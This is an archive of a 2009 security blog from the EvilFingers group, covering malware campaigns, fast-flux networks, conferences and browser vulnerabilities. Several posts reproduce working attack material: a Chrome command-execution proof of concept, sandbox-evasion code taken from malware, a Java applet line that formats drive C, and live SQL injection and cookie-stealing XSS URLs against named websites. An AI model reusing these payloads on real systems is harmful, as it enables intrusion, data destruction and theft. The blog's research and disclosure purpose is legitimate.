Saturday, January 31, 2009

Thanks to everyone

Time to remember the past:

We started off as a very tiny site(we are still small), though we have expanded by a little bit. Thanks to every single volunteer who has made this happen. Thanks to our partners, viewers/users, media supporters, and everyone who has contributed to our team in one way or another.

Time to think about the future:

We are coming up with our new malware analytics portal which will be lead by Bonfa[PM] and rootkit analytics portal lead by Kirk. Bonfa and his 2 friends have been working really hard for the malware analytics portal and about 95% of the preliminary beta version for the release is done. We are expecting to see this site by mid-end of Feb 2009. Kirk[PM] and Naga[TM] have been working hard on Rootkit analysis portal, though it is expected to start up only by end of May 2009.

Kevin[TM] has been working really hard on Multi-core bruteforcer and will be up with one really soon. His research and analysis will be published soon. Jorge Alejandro Mieres[TM], has proven skills over consistent research and blogging. He will be working on our NectarGrid project really soon, though he is still doing his research.

Congratulations to Aditya K Sood[PM], who is our new Project Manager for the Vulnerability Analytics team, a portal for supporting CERT around the world, that would be coming really soon. Thanks to Kalyana Kumar[TM] for his constant dedication on PCAP capture, he is becoming a team lead by the end of Feb 2009.

Thanks to everyone else who are not listed in current projects, for your consistent help and passion towards information security. Keep it coming, guys!!!

- EF

[PM] - Project Manager
[TL] - Team Lead
[TM] - Team Member

Google is Malicious

Google tells everyone that they themselves are malicious and they would harm your computer if you visit their site. We are not saying this, but Google is... check the following:



One of our researchers, Rohit Bansal sent us a link that says the same:

When someone clicks on this http://www.google.com/interstitial?url=http://google.com/

we got the following page this morning:



Google is trying to communicate to this world people. They are telling you that they are over-priced and not to buy their stocks since they are malicious to the current economic conditions.

Joe from JoeSecurity/www.Joebox.org was discussing about the end results with EvilFingers this morning. Funny thing is, Google stocks is dropping down strangely today. Though, we do not know if this is the cause. But we wouldn't blame people for not clicking on Google when they themselves caution you that they are malicious.

End Result Graph: (Correlated for fun)



However, it is still not proven that the dip in the stocks was due to this terrible error, it makes sense even if it does.

This is an example of : how research & development can be hazardous to a giant org by entering production without testing... It is funny, how this repetitive pattern has been seen for every large kingdoms or organizations, that they would climb high and become famous so quick and they seek for self-destruction or disasters.

- EF

Electronic security and spread of malware

A growing number of cases is known about infections or potential infections, through electronic devices. The last known case, which I commented on malware preinstalled (in Spanish), has sparked an interesting discussion that reminds me of a nice story on this topic.

After a talk on Antivirus Security in which I explained in what is Social Engineering and how worms spread through a text file named Autorun.inf (not a malware simply takes the functionality of automatic execution of Windows), one of the attendees asked me one of the programs that were used during the talk, which I copied it into a USB stick and the pass, but this person, attentive, I said no, I don't want to connect that memory because my computer may be infected and infected my computer will end. Although the report was clean, that was correct.

Well, I said, "I copy on another medium," and copied the same file on an iPod. The person was in line and connects the iPod to your computer without taking into account that not doing anything other than access to a storage device that is also likely to host malicious code.

The removable storage devices that connect via USB with a high rate of effectiveness in the dissemination of malicious code, ie not just speaking about USB, speaking of iPods, mp3 players, mp4, cameras, camcorders , cell phones, digital photo frames, and any device that has interaction with the PC.

From the economic point of view, many countries get any of these devices at low cost, however, this represents an extra risk due to little control that is deposited in the manufacturing process of these devices, and quality control when it goes on sale and may be potential channels of infection, even through the CD that accompanies the device.

Somewhere I read the recommendation to purchase products from renowned companies, however, isn't a guarantee and, in cases such as Samsung will demonstrate this. As you can see, absolutely nothing is certain, but if it's safe to implement mechanisms that allow us to mitigate such problems, eg maintain an active and updated antivirus program.

Some history of infection during 2008 through various devices that can be highlighted are:

Samsung SPF-85H 8-Inch Digital Photo Frame
Mercury 1.5" Digital Photo Frame
Hewlett-Packard USB Drives 256K / 1GB
Insignia 10.4" NS-DPF10A Digital Photo Frame

Not to panic, but to be careful :-)

# Jorge Mieres

Friday, January 30, 2009

Yet Another Google Chrome Sploit

Milw0rm released a Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC [ by waraxe]

****The following is copied and pasted from http://www.milw0rm.com/exploits/7935****

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

< html > < head >< title >Chrome URI Handler Remote Command Execution PoC< / title >< / head >
< body >
< h3 >This is a test< / h3 >
< iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0 >< / iframe >
< / body>< / html>

# milw0rm.com [2009-01-30]

Sandbox Awareness

Hi there,

In the last period, malware evolved to new Detection Ways, like Sandbox Awareness, if a malware is executed into one of the most famous Sandboxes it block execution.

Here a little piece of code taken fro a malware and readapted:


Public Function IsInSandbox() As Boolean
Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
Dim me32 As MODULEENTRY32
Dim szBuffer As String * 128

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)

me32.dwSize = Len(me32)
Module32First hSnapShot, me32

Do While Module32Next(hSnapShot, me32) <> 0
If InStr(1, LCase(me32.szModule), “sbiedll.dll”) > 0 Then ‘Sandboxie
IsInSandbox = True
ElseIf InStr(1, LCase(me32.szModule), “dbghelp.dll”) > 0 Then ‘ThreatExpert
IsInSandbox = True
End If
Loop

CloseHandle (hSnapShot)

If IsInSandbox = False Then
hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows\CurrentVersion”, 0, KEY_ALL_ACCESS, hKey)
If hOpen = 0 Then
hQuery = RegQueryValueEx(hKey, “ProductId”, 0, REG_SZ, szBuffer, 12 8)
If hQuery = 0 Then
If InStr(1, szBuffer, “76487-337-8429955-22614″) > 0 Then ‘Anubis
IsInSandbox = True
ElseIf InStr(1, szBuffer, “76487-644-3177037-23510″) > 0 Then ‘CWSandbox
IsInSandbox = True
ElseIf InStr(1, szBuffer, “55274-640-2673064-23950″) > 0 Then ‘JoeBox
IsInSandbox = True
End If
End If
End If
RegCloseKey (hKey)
End If
End Function


It detects Sandboxie, ThreatExpert, JoeBox, CWSandBox and Anubis, by checking the Product Id or the presence of usual dll like sbiedll.dll and sbiedll.dll

Understanding Fast-Flux networks

Fast-Flux networks are an advanced methodology in the spread of threats that are currently exploited in an active way to infect computers (among other crimes). The goal is to hide the IP addresses through which rotate in seconds against the same domain, making it impossible to locate in order to block their identification difficult.

Each of these IP addresses that are assigned to domains, are machines that have previously been involved with some malicious code as part of a botnet, and work as a "bridge" between the team and requesting specific action the server hosting the resource. This method of operation of the network is called the Single-Flux.

That is, in a normal process a client makes a request (GET) to the server which then responds by offering the customer the result in single-flux networks, the original request made by the client doesn't bounce against the server but it does against the zombie machine, and this is who performs the query to the server.

There is another method called the Double-Flux which, in addition to providing the features of single-flux, the operating name resolution and registration services for domain names.

Through a simple DNS query against a domain is possible to establish whether this is part of a Fast-Flux network. In the following example showing the different IP addresses that are set to the domain www.lijg.ru.

;; QUESTION SECTION:
;www.lijg.ru. IN A

;; ANSWER SECTION:
www.lijg.ru. 600 IN A 24.107.209.119
www.lijg.ru. 600 IN A 24.219.191.246
www.lijg.ru. 600 IN A 65.65.208.223
www.lijg.ru. 600 IN A 65.102.56.213
www.lijg.ru. 600 IN A 67.141.208.227
www.lijg.ru. 600 IN A 68.124.161.76
www.lijg.ru. 600 IN A 69.14.27.151
www.lijg.ru. 600 IN A 70.251.45.186
www.lijg.ru. 600 IN A 71.12.89.105
www.lijg.ru. 600 IN A 71.235.251.99
www.lijg.ru. 600 IN A 75.11.10.101
www.lijg.ru. 600 IN A 75.75.104.133
www.lijg.ru. 600 IN A 97.104.40.246
www.lijg.ru. 600 IN A 173.16.99.131

;; AUTHORITY SECTION:
lijg.ru. 345600 IN NS ns5.lijg.ru.
lijg.ru. 345600 IN NS ns1.lijg.ru.
lijg.ru. 345600 IN NS ns2.lijg.ru.
lijg.ru. 345600 IN NS ns3.lijg.ru.
lijg.ru. 345600 IN NS ns4.lijg.ru.

On the other hand, say that a picture is worth a thousand words so ... let's see what he says the following, obtained from SecViz created by Jaime Blasco:

The representation of Fast-Flux networks using graphic tools is an excellent alternative since it allows, through a single view, hear from a structural point of view and very attractive as comprising such a network.

In this example, the chart shows a series of Fast-Flux domains (blue) and each of the zombie PCs that comprise it (red). In making the triangulation of each of the domains infected, we noticed that some belong to multiple networks within an FF network structure.

This implies greater advantage to the attacker because it has a far wider range of teams that are used in a distributed manner to spread malware much, much more spread spam, make much of phishing attacks, and many other activities malicious and fraudulent.

# Jorge Mieres

Thursday, January 29, 2009

uCon Speaker line-up

--------------------------------------------
The partial speaking line up of uCon Security Conference 2009 has been announced. The organizing committee would like to thank everyone who submitted their proposals. Within a few days we will be announcing the complete list of speakers.

The conference will take place three days after the most insane street carnival in the world in Recife, Brazil, on 28th February 2009 and will also feature trainings sessions on 26th and 27th.

If you are outside Brazil and plan to attend to uCon, please contact us if you need any assistance on your travel. Carnival and hacking in a row, rather unique. Don't miss the chance.

For more information please visit http://www.ucon-conference.org.


PS: All training sessions will be delivered in Portuguese.


[-- SPEAKING LINE-UP: FIRST ROUND --]

Speaker: Jayson Street, CISSP (Stratagem One)
Keynote: "Dispelling the myths and discussing the facts of global
cyber-warfare"
Language: English
Track: Information warfare


Speaker: Stephen Ridley (Matasano)
Speech: "Intro to Windows Kernel Security Development"
Language: English
Track: Kernel hacking / reverse engineering / vuln-dev


Speaker: Julio Auto (Independent researcher)
Speech: "Practical (Introduction to) Reverse Engineering"
Language: Portuguese
Track: Reverse engineering


Speaker: Rodrigo Rubira Branco aka BSDaemon (Checkpoint / COSEINC)
Speech: "Advanced Payload Strategies: What is new, what works and what
is hoax?"
Language: Portuguese
Track: Vuln-dev / shellcoding


Speaker: Joseph McCray (Rapid7 / LearnSecurityOnline.com)
Speech: "Advanced SQL Injection"
Language: English
Track: Web hacking


Speaker: Gustavo Monteiro (Independent researcher)
Speech: "Secure log centralization, analysis & security visualization"
Language: Portuguese
Track: Log & event correlation / security visualization


Speaker: David Batanero (Independent researcher)
Speech: GSM for fun and profit
Language: English
Track: Telecom security


Speaker: Felipe Andres Manzano (Nimbuzz.com)
Speech: "Exploiting PDF Readers"
Language: English
Track: Vuln-dev / software testing
-----------------------------------------------

New strategy of social engineering to spread IE Defender

IE Defender is one of the many fake security programs (scareware, also called rogue) that constantly bombard the users with the intent to infect their computers through the websites that pretend to be legitimate.

However, there are new strategies for detecting deception to spread and don't share the same methodology for download from the website scareware, but seeking to trick users to achieve their goals, in this case, IE Defender is being disseminated to through websites that promise to downloading music in mp3 format and movies.

In either case, download the album or movie is downloaded but promised one of the variants in the family of IE Defender.

All the pages used to spread threats share the same IP address (216.240.151.112) Download:

free-games-rapidshare .com
movie-rapidshare .com
moviesrapidshare .org
music-rapidshare .com
musicrapidshare .org
warez-catalog .com
movie-megaupload .com
cpmusicpub .com
soft-rapidshare .net
softrapidshare .com
softrapidshare .org
ftp-warez .org
extra-turbo .com
softupdate09 .com
cpmusicpub .com
free-full .com

A minor detail that identifies these malicious sites, is that nearly all pretending to be hosted pages on sites that can store files like Megaupload, Rapidshare or directly warez sites designed for downloading.

# Jorge Mieres

Wednesday, January 28, 2009

Google Chrome 1.0.154.43 ClickJacking Vulnerability.

---------------------------------------------------
Advisory: Google Chrome 1.0.154.43 ClickJacking Vulnerability.

Version Affected: Google Chrome: 1.0.154.43

Release Date:
Disclosed: 27 January 2009
Released: 28 January 2009

Description:
The Google chrome browser is vulnerable to clickjacking flaw.A clickjacked page tricks a user into performing undesired actions by clicking on a concealed link. attackers can trick users into performing actions which the users never intended to do and there is no way of tracing such actions later, as the user was genuinely authenticated on the other page.

Proof-of-Concept:
Click Here
Alternate Link: http://www.secniche.org/gcr_clkj/

Credit:
Aditya K Sood (Founder, www.Secniche.org / Team Lead, www.EvilFingers.com)

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.

---------------------------------------------------

Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs

Danmec, or Asprox, is called a trojan designed to recruit zombie machines while collecting information for each of the victims infected.

While the appearance of this trojan isn't new, it's now worth more complex strategies that typically used by other malicious code, including its early variants, such as the Fast-Flux to avoid detection by blocking programs and infect as many computers as possible.

Today, Fast-Flux networks are massively exploited and thousands of active domains of Russian origin, such as activating again botnets created by Danmec.

google-analitycs.lijg .ru
fmkopswuzhj .biz

fnygfr .com
fvwugekf .info

fwkbt .info

gbrpn .org

gbxpxugx .org

ghtileh .biz

gnyluuxneo .com

fuougcdv .org

www. dbrgf .ru

www. bnmd .kz

www. nvepe .ru

www. mtno .ru

www. wmpd .ru

www. msngk6 .ru

www. vjhdo .com

www. aspx37 .me

google-analitycs.dbrgf .ru

www. advabnr .com

www. lijg .ru

www. dft6s .kz


Each of these domains hosting the following script written in JavaScript called script.js (MD5: ccec2c026a38ce139c16ae97065ccd91), which runs from a Drive-by-Download:

This call through the iframe tag is made to a URL that is part of a Fast-Flux network.

, google-analitycs.lijg.ru. IN A

;; ANSWER SECTION:
google-analitycs.lijg.ru. 600 IN A 68.119.39.129
google-analitycs.lijg.ru. 600 IN A 69.176.46.57
google-analitycs.lijg.ru. 600 IN A 71.12.89.233
google-analitycs.lijg.ru. 600 IN A 76.73.237.59
google-analitycs.lijg.ru. 600 IN A 97.104.40.246
google-analitycs.lijg.ru. 600 IN A 98,194,180,179
google-analitycs.lijg.ru. 600 IN A 146.57.249.100
google-analitycs.lijg.ru. 600 IN A 151,118,186,131
google-analitycs.lijg.ru. 600 IN A 165.166.236.74
google-analitycs.lijg.ru. 600 IN A 173.16.99.131
google-analitycs.lijg.ru. 600 IN A 173.17.180.79
google-analitycs.lijg.ru. 600 IN A 24,107,209,119
google-analitycs.lijg.ru. 600 IN A 24,170,188,201
google-analitycs.lijg.ru. 600 IN A 68.93.61.194

;; AUTHORITY SECTION:
lijg.ru. 339897 IN NS ns3.lijg.ru.
lijg.ru. 339897 IN NS ns2.lijg.ru.
lijg.ru. 339897 IN NS ns1.lijg.ru.
lijg.ru. 339897 IN NS ns5.lijg.ru.
lijg.ru. 339897 IN NS ns4.lijg.ru.

;; Query time: 263 msec
;; SERVER: 192.168.240.2 # 53 (192.168.240.2)
;; WHEN: Sun Jan 25 20:31:57 2009
;; MSG SIZE rcvd: 356

While each of the web addresses above lines form a new farm Fast-Flux networks with groups of IP addresses mirrors.

Fast-Flux is an advanced technique used for malicious purposes, together with others, for the spread of various threats. This means be cautious at all times.

# Jorge Mieres

Tuesday, January 27, 2009

Hibernation Time

We know that it is winter time for sure because some of our projects and volunteers have been hibernating.

Hibernating Projects:

  • Data Breach

  • ICMP Stuff

  • IP Stuff

  • Block Lists



Hibernating Sections:

  • PatchTuesday

  • NectarGrid

  • Reviews

  • Jobs



Hibernating Volunteers:

  • Blake Hartstein

  • Jack O'Neill

  • Ion Visser

  • John Smith

  • Neo Anderson

  • Rishi Narang



This definitely confirms that it is winter time :) and definitely a good time for hibernation. We appreciate all our volunteers for their patience and determination and we encourage our readers/users to join us in creating a secure future.

- EF

PMDv1.8

Logging Functionality:
Process Memory Dumper[PMD] is now coming up with a new update of Logging functionality for forensic analysts to log the processes for later use. This comes along with MD5 functionality to produce evidence in court if required.

The later version of PMD is coming up with a SNAPSHOT functionality where the entire Memory would be dumped similar to the core dumping of memory, along with the entire memory logging functionality.

Extension of PMD would then take us into a new toolchest called SpyOS. SpyOS is built to help a Forensic analyst right from the identification stage to the court scene[including, assessment/research and analysis]. This would be an entire system monitor combined with process viewer.

- EF

Deception techniques that do not go out of fashion

Are we children of rigor?

One issue that motivates daily reflection is why some users are still falling into traps and otherwise known.

Social engineering techniques such as double extension files, spaces between the file name and extension, and since it began using the Internet as a platform for attack, techniques such as fake codecs are a small sample of some of them.

Web sites that host pornographic material are the most visited online and also the most used by disseminators malware to propagate threats. And rather than ask ourselves how it can still be possible for users continue infecting their computers through the strategies of deception, the answer would seem to lie in something as simple as to justify a "high demand" by the consumption of such material as one of the most wanted.

Malware creators are well aware that the thing is, and that the person who visits a pornographic site, wants to see pornography, regardless of the format in which this resource (video and/or image), including, if that offers the user downloads an even number, false codecs to view the video course, it is likely that in most cases, the user download.

So will see something like the screen shown in the capture, which take a few seconds to display a pop-ups similar the following:

The user, thinking that this is a codec needed to display video, installs it. In fact, it is one that installs malware, to date only detected by some antivirus companies.

On the other hand, there is an application consisting of an HTML file that is used to propagate massively by any means and this type of action.

The application doesn't create or modify, but malicious code that allows them to spread through the classic mode mentioned. The only requirement is hosted on a server (or zombie PC) and specify the HTML code in your address download malware in the next portion of code.

window.setTimeout ( "location.href = 'http://servidor.com/archivo.exe", 1000);

As additional components, the kit also proposes to redirect the display of a real video. This is part of the strategy of social engineering and seeks to clear any suspicion from the user.

We no longer speak only of techniques such as Drive-by-Download, exploit, scripting, code obfuscation, among many others, but we are talking about caution and common sense.

That is not enough just to trust the security risks caused by malicious code and antivirus solutions that, in this case and according to the report VT, AV currently offer only a 35.09% protection, where only 14 of 39 detect the threat, the other 64.91% will depend significantly on our ability and common sense to detect potential malicious activity.

# Jorge Mieres

Monday, January 26, 2009

Attacking Mac systems through false security tool

Who said that everything was for windows? ;-P

While the bulk of the various techniques of deception and infection are very common on Windows platforms, security is the responsibility of any system, regardless of their infrastructure or platform, so there are threats from rogue type (also called scareware) for Mac systems.

In this case, the recent false security tool called iMunizator (actually is not as recent :-) gave its first steps during 2007 and early 2008, but returned to the "cargo" again), you can be downloaded from various web sites that respond to a single IP address (67.205.75.10) hosted by Ukraine, a Web hosting company called iWeb Technologies Inc.

www.imunizator .com
www.imunizator .net

imunizator .com

imunizator .net

mac-imunizator .net


This malware shares "website" to other rogue much known across the IP 70.38.19.203:

Antispyware Deluxe (antispywaredeluxe .com)
Antivirus 2009 (antivirus-2009-pro .net)
Antivirus 2010 (av2010 .net)
Vista Antivirus 2008 (vav-2008 .net)

iMunizator is deploying its strategy of deception for some time, switching domain to revive, even changing his name (formerly MacSweeper).

One more interesting is that the transfer of shares to "buy" the wrong tool is done through a company called Plimus e-commerce, completely legal but Israeli origin with offices in central U.S. (San Diego and Silicon Valley) and Ukraine. That is why users will see in the address bar secure HTTPS protocol on any recommendation, and other safety guidelines that seek to demonstrate that we are operating from a trusted site.

The current malware seeking to obtain sensitive information from users to commit fraud in which a high rate of propagation felt windows platforms, but this means that the creators of malware is turning its sights toward new goals. Therefore, we must manage them good security practices regardless of the technology to which it applies.

More information about scareware:
Una recorrida por los últimos scarewawe
Una recorrida por los últimos scarewawe II

# Jorge Mieres

Sunday, January 25, 2009

Massive exploitation of vulnerabilities through servers ghosts

The number of chinese domains who daily are used to exploit vulnerabilities on computers of people who access the web pages designed with malicious purposes, it is really important.

These servers hosting pages containing exploits weaknesses for different Microsoft Windows operating systems and some other applications. Currently being used on a massive scale for the spread of malicious code.

According ThreatExpert, China along with Russia make up the two countries with the highest rate of spread of threats.
Domains below are housed in server farms, and many ghosts are active, it is suggested to be cautious if they want access. The aim to make these domains is purely investigative and informative, and considered useful for blocking malicious URLs.

*.705sese cn (59.34.197.15) contains exploits for MS06-014, MS08-067, StormPlayer, RealPlayer running from /a2/fxx.htm and download the binary al.css exploiting vulnerability in a timely MS08-067.
*.S350-d.bc cn (58.253.68.65) binary download gr.exe (MD5: abd5bcb105dd982ae0b9c1f8c66bc07c).
*.yandex2 cn (193.138.172.5) binary download load.exe (MD5: 2ce6d3c0f526f96b32db8cef06921ffc) from /load.php?spl&id=21=5.
*. metago cn (193.138.172.5)
*.copy-past cn (195.242.161.24) contains exploit.
*.whitebiz cn (91.211.64.155) binary download load.exe (MD5: d7d03b7ea57ecaf008350a4215f8e2bc) from /service/load.php.

*.winesamile cn
*.bigsellstaff cn
*.cntotalizator cn

*.fiesta-tests com

*.fresh-best-movies cn

*.helinking cn

*.ns2.oxdnski cn

*.onlinestat cn

*.trafiks cn
*.783456788839 cn (195.190.13.106) trojan download from /load.php?spl=zango1.
*.234273849543 cn
*.384756783900 cn

*.109438129432 cn

*.sinakis cn (91.211.64.89) malware download from /baner/load.php?id=187&spl=4.
*.nohtingherez cn
(217.20.112.96) binary download adv111.exe (MD5: 4adc9c50005c301db9af13f8467801f7).
*.o6ls cn (91.203.4.137) malware download from /load.php?id=3459&spl=4.

# Jorge Mieres

Saturday, January 24, 2009

Applet Of Death FULL DISCLOSURE!

Applet Of Death FULL DISCLOSURE!

Proof of Concept How an Innocent Looking Applet can Harm/Take Control your PC.

This is demostration of how a java Applet can harm you PC . We have not see nobody exploiting Java Applets , yet . But a Rogue website hosting a rogue Signed Applet is as dangerous as an ActiveX . Which means Full Control of the System who ever visited that website and accept Security Warning. Security Warning Dialog made by Sun on a Signed Applet is very Weak , which dont say any thing about harming your PC. THIS APPLET I am going to demonstrate will do not do any harm but will Fire Up a Calc.exe , which is under window's System32 Folder. (Provided that user run the applet as Administrator) .

This applet can made to run any application under browsing user's privileges by simpling placing this line :

p = Runtime.getRuntime().exec(System.getenv("windir")+"\\system32" +"\\calc.exe");

with any exe u want to run :)

eg .

p = Runtime.getRuntime().exec(System.getenv("windir")+"\\system32" +"\\cmd.exe /c format c:");

will Format the visitor's drive c !!!

Steps a visitor need to become a victim are :
1. Go to the webpage hosting applet (applet can even made invisible) .
2. Accept the Certificate Warning dialogue box raised (it is not even security dialog , just a certificate warning)
3. Thats all , you are owned :).

Full Source Code is Released under BSD License.
Enjoy!

Video is done by Arkar WMH.
By v3ss (phyo.arkarlwin@star-nix.net)
StarNix Solutions.

Greetz to : Arkar WMH, Shyaam and Everyone at Evilfingers

More information (Video and the code) can be found HERE.

- EF

New PCAPs Released - XScan PCAP

XScan PCAP, could be found here:

  • XScan PCAP


  • Check it out when you get a chance.

    - EF

    MSN Credential Theft - http://zopblob.com/

    Hi there,

    In these days is running another malicious domain specifically developed to Steal MSN Credentials, the propagation system is always the same, you receive an offline message by an already infected user of your msn list.

    http://{ACCOUNT_NAME}zopblob.com/

    The Server used is as usual lighttpd

    HTTP/1.0 200 OK
    Connection: close
    X-Powered-By: PHP/4.4.8
    Content-type: text/html
    Content-Length: 791
    Date: Sun, 25 Jan 2009 01:01:51 GMT
    Server: lighttpd/1.4.19

    and the link dissected appears as:

    <>
    <>
    <> < / title >
    < / head >
    < cols = " 0 , * " frameborder =" 0">

    < src =" ”" name =" ”"> < src =" ”" name =" ”"> var sc_project=4080201;

    < / frameset >

    This time we have also a little difference, this time malicious domain presents a tracking
    functionality

    < type = " text / javascript ">

    var sc_invisible=1;
    var sc_partition=49;
    var sc_click_stat=1;
    var sc_security="0c7fe093";
    < / script >
    < type = "text/javascript ">
    var gaJsHost = ((" https:" == document.location.protocol) ? " https://ssl. " : " http://www. " );
    docum ent.write(un escape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js'
    type='text/javascript'%3E%3C/script%3E"));
    < type="text/javascript">
    var pageTracker = _gat._getTracker("UA-1033286-4");

    pageTracker._trackPageview();http://www.networksolutions.com/whois-search/zopblob.com

    < / script >
    < / script >

    A Domain Whois reveals that the Source of this Malicious Domain is always the same..from Panama:

    See you to the next post.. :)

    Friday, January 23, 2009

    Moral of the day: Jan 23rd, 2009

    "Enjoy life when you get a chance. Take some time to appreciate nature."

    Gist: Time will run so quickly that you don't get to appreciate the present, if you think only about the future.

    Thursday, January 22, 2009

    Moral of the day: 22 Jan 2009

    "Never fear, because God is here."

    Gist: God is inside everyone.

    - EF

    New Stillsecure Strataguard Release

    *** SHAMELESSLY COPIED FROM EMERGINGTHREATS BLOG ***
    Stillsecure has been a great contributor to Emerging Threats over the years. They've just released a new version of their Strataguard appliance load.

    If you have the time give it a look. There's a free to use version and others with commercial support. They run our rules as well as the VRT and your own. Great system, if you're in the market give it a look! If you've tried it out let us know on the lists how it does. I know they're eager for the feedback.

    http://www.stillsecure.com/strataguard/index.php

    Matt

    *** SHAMELESSLY PASTED FROM EMERGINGTHREATS BLOG ***

    Wednesday, January 21, 2009

    Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

    http://www.milw0rm.com/exploits/7842 shows a PoC of Status Bar Clickjacking in Firefox 3.0.5, published by MrDoug.

    function updatebox(evt) {
    mouseX=evt.pageX?evt.pageX:evt.clientX;
    mouseY=evt.pageY?evt.pageY:evt.clientY;
    document.getElementById('mydiv').style.left=mouseX-1;
    document.getElementById('mydiv').style.top=mouseY-1;
    }

    is called by an Mouse OnClick action [onclick="updatebox(event)"].

    Check it out.

    - EF

    Moral of the day: Jan 21st, 2009

    "Never lead someone with your words, but lead them by putting your words into action."

    Gist: A good leader is never a dictator, but leads his/her team by being a follower.

    - EF

    Tuesday, January 20, 2009

    Videos from HITBSecConf2008 - Malaysia released!

    ***************COPIED FROM EMAIL***************
    The videos from HITBSecConf2008 - Malaysia are now available for download!

    Day 1
    =====

    http://thepiratebay.org/torrent/4654588/HITBSecConf2008_-_Malaysia_Videos___Day_1

    Keynote Address 1: The Art of Click-Jacking - Jeremiah Grossman
    Keynote Address 2: Cyberwar is Bullshit - Marcus Ranum

    Presentations:

    - Delivering Identity Management 2.0 by Leveraging OPSS
    - Bluepilling the Xen Hypervisor
    - Pass the Hash Toolkit for Windows
    - Internet Explorer 8 - Trustworthy Engineering and Browsing
    - Full Process Reconsitution from Memory
    - Hacking Internet Kiosks
    - Analysis and Visualization of Common Packers
    - A Fox in the Hen House - UPnP IGD
    - MoocherHunting
    - Browser Exploits: A New Model for Browser Security
    - Time for a Free Hardware Foundation?
    - Mac OS Xploitation
    - Hacking a Bird in The Sky 2.0
    - How the Leopard Hides His Spots - OS X Anti-Forensics Techniques


    Day 2
    =====

    http://thepiratebay.org/torrent/4654974/HITBSecConf2008_-_Malaysia_Videos___Day_2

    Keynote Address 3: Dissolving an Industry as a Hobby - THE PIRATE BAY

    Presentations:

    - Pushing the Camel Through the Eye of a Needle
    - An Effective Methodology to Enable Security Evaluation at RTL Level
    - Remote Code Execution Through Intel CPU Bugs
    - Next Generation Reverse Shell
    - Build Your Own Password Cracker with a Disassembler and VM Magic
    - Decompilers and Beyond
    - Cracking into Embedded Devices and Beyond!
    - Client-side Security
    - Top 10 Web 2.0 Attacks

    ===

    On a related note, the registration for HITBSecConf2009 - Dubai (20th -
    23rd April) is now open!

    http://conference.hitb.org/hitbsecconf2009dubai/

    The Call for Papers (CFP) for HITBSecConf2009 - Malaysia (October 5th -
    8th) will open in March 2009.

    A belated Happy New Year from all of us at Hack in The Box and may all
    your exploits result in root shell! :)

    The HITB Team.

    ***************COPIED FROM EMAIL***************
    - EF

    Moral of the day: Jan 20th, 2008

    "Never wait for a leader, when there is one inside you."

    - EF

    Monday, January 19, 2009

    Vulnerabilities & proofs-of-concept

    During this week, securityfocus, have reported a number of vulnerabilities in several applications where, as usual, one can not miss for Microsoft environments. Given that these "unsafe gaps" in planning the program allows to conduct attacks of various kinds, it's interesting to know the potential that can exploit a vulnerability through proofs-of-concept.

    Office Viewer AcitveX Controls (OCX)
    Office Viewer presents a series of vulnerabilities in ActiveX controls that allow you to edit and view Microsoft Office files from your web browser. This implies the possibility of an attacker to execute arbitrary code with the privileges of the current user.

    There are a number of PoC on these vulnerabilities:
    http://downloads.securityfocus.com/vulnerabilities/exploits/33245.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33238_powerpoint.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33238_office.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33238_word.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33222.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33243-office.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33243-powerpoint.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33243-word.html
    http://downloads.securityfocus.com/vulnerabilities/exploits/33243-excel.html


    Microsoft Knowledge Base
    How to prevent the execution of an ActiveX control in IE

    NullSoft Winamp v5.3.2 & sup
    Since this version of Winamp, there defects in the processing of mp3 files and AIIF (Audio Interchange File Format) by which, through mp3 file or AIFF intentionally manipulated could cause a buffer overflow to allow an attacker to execute arbitrary code with the privileges of the current user. There is a PoC for this weakness:

    http://downloads.securityfocus.com/vulnerabilities/exploits/33226.pl

    Microsoft Windows Compiled HTML Help Handling Buffer Overflow
    The Compiled HTML Help (CHM) is a document format, commonly used in help files for Microsoft Windows. Through an intentional manipulation of this style can exploit a vulnerability in Windows XP SP3 causing a buffer overflow.

    http://downloads.securityfocus.com/vulnerabilities/exploits/33204.pl

    # Jorge Mieres

    Sunday, January 18, 2009

    Today's Update: Jan 18 2009

    Advisories:

    Aditya K Sood has released his most recent advisory on Oracle E-Business Suite, which can be obtained from the following link:

    [HTML] [PDF]

    Tools:

    Kirk McGraw has released the most recent update on Process Memory Dumper [PMD] v1.6, which can be obtained from the following link:

    [Process Memory Dumper v1.6]
    [Process Memory Dumper v1.6 (GUI Mode)- Download Tool]

    Snapshot of PMDv1.6:




    New PCAPs on Scan Traffic releasing today. Kalyana Kumar, our new volunteer is releasing his second pack of PCAPs on XScan traffic.

    - EF

    Saturday, January 17, 2009

    SQL Injection and XSS Vulnerabilities

    Rohit Bansal, an active member of security research community has been actively submitting XSS and SQL Injection to PacketStormSecurity and XSSed websites.

    He sent us the following stuff for publishing in our blog:

    *** PASTED FROM Rohit Bansal's EMAIL ***

    SQL Injection:

    Vuln: http://othersports.virginmedia.com/minorsports/news.php?id=25418+and+1=0+ and 1=0 Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10

    XSS:

    http://www.mozillazine.org/talkback.html?article=26260%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Ch2%3EXSS%20By%20Evilfingers%3Ch2%3E%3C/script%3E

    *** PASTED FROM Rohit Bansal's EMAIL ***

